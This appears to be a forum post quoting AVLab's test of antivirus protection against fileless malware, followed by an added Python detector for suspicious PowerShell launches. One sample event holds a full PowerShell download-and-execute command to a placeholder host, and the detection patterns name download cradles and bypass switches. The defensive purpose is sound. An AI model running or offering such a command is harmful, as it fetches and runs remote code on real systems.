- Dec 12, 2013
And the next test of Polish AVLab
https://avlab.pl/sites/default/files/68files/Malware_Fileless_Protection_Test_EN.pdf

The threats examined in this report are so-called fileless malware. Although the infection vector usually starts traditionally, i.e. from the delivery of a malicious file to the victim’s computer – via scam or a drive-by download attack as a result of using an exploit – this is where the similarities to traditional attacks with files end. The fileless malicious software operates directly in the computer’s internal memory. In this scenario, the activated virus will not be transferred to quarantine by the protecting software as it is not a file, but a set of instructions to be executed, operating on system processes.
(...)
Four types of malicious software files with similar instructions were used to check the effectiveness of protecting modules of each tested program.
• M1.bat file included an instruction of virus download via PowerShell with suitable parameters.
• M2.exe compiled file included similar instructions.
• M3.exe file was subjected to code obfuscation.
• M4.docm file included malicious macroinstructions activating PowerShell with relevant parameters.
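Since the report's samples leave no file to quarantine, the defender's signal is the process-creation record of PowerShell itself (its parent process and command-line switches). The following is an added example, not code from AVLab or the report, that runs a simple indicator check over constructed process-creation events; the field names, thresholds and the `example.invalid` URL are assumptions for illustration.

```python
import re
from typing import Dict, List

# Command-line indicators commonly used in PowerShell detection content
# (matched case-insensitively); each carries a label for the alert.
INDICATORS = [
    ("encoded_command", r"(?:^|\s)-e(?:c|n|nc|ncodedcommand)?\b"),
    ("hidden_window", r"-w(?:indowstyle)?\s+hidden"),
    ("no_profile", r"-nop(?:rofile)?\b"),
    ("policy_bypass", r"-e(?:xecutionpolicy|p|x|xec)\s+bypass"),
    ("download_cradle", r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient|start-bitstransfer"),
    ("in_memory_exec", r"\biex\b|invoke-expression"),
    ("remote_url", r"https?://"),
]
# A PowerShell child of an Office application is the M4.docm macro case.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}

# Constructed sample events (shape loosely follows Sysmon event 1 / Security
# event 4688 fields; all values are invented, the base64 blob decodes to "ABCD").
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"parent": "cmd.exe", "image": "powershell.exe",            # M1.bat style launch
     "cmdline": "powershell.exe -NoP -W Hidden -Exec Bypass -c "
                "\"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/x')\""},
    {"parent": "WINWORD.EXE", "image": "powershell.exe",        # M4.docm style launch
     "cmdline": "powershell.exe -EncodedCommand QQBCAEMARAA="},
    {"parent": "explorer.exe", "image": "powershell.exe",       # benign admin script
     "cmdline": "powershell.exe -NoProfile -File C:\\Scripts\\inventory.ps1"},
    {"parent": "svchost.exe", "image": "notepad.exe",           # not PowerShell at all
     "cmdline": "notepad.exe readme.txt"},
]


def analyse(event: Dict[str, str]) -> List[str]:
    """Return the indicator labels hit by one process-creation event."""
    hits: List[str] = []
    if event["image"].lower() not in ("powershell.exe", "pwsh.exe"):
        return hits
    if event["parent"].lower() in OFFICE_PARENTS:
        hits.append("office_parent")
    for label, pattern in INDICATORS:
        if re.search(pattern, event["cmdline"], re.IGNORECASE):
            hits.append(label)
    return hits


def is_suspicious(event: Dict[str, str]) -> bool:
    # A single switch is common in legitimate admin scripts, so require two
    # independent indicators, or any PowerShell spawned by an Office process.
    hits = analyse(event)
    return "office_parent" in hits or len(hits) >= 2


def triage(events: List[Dict[str, str]]) -> List[str]:
    """Command lines that should be escalated, in input order."""
    return [e["cmdline"] for e in events if is_suspicious(e)]
```

On the constructed events, the first two are escalated and the `-NoProfile -File` admin script is not, which is the point of requiring more than one indicator.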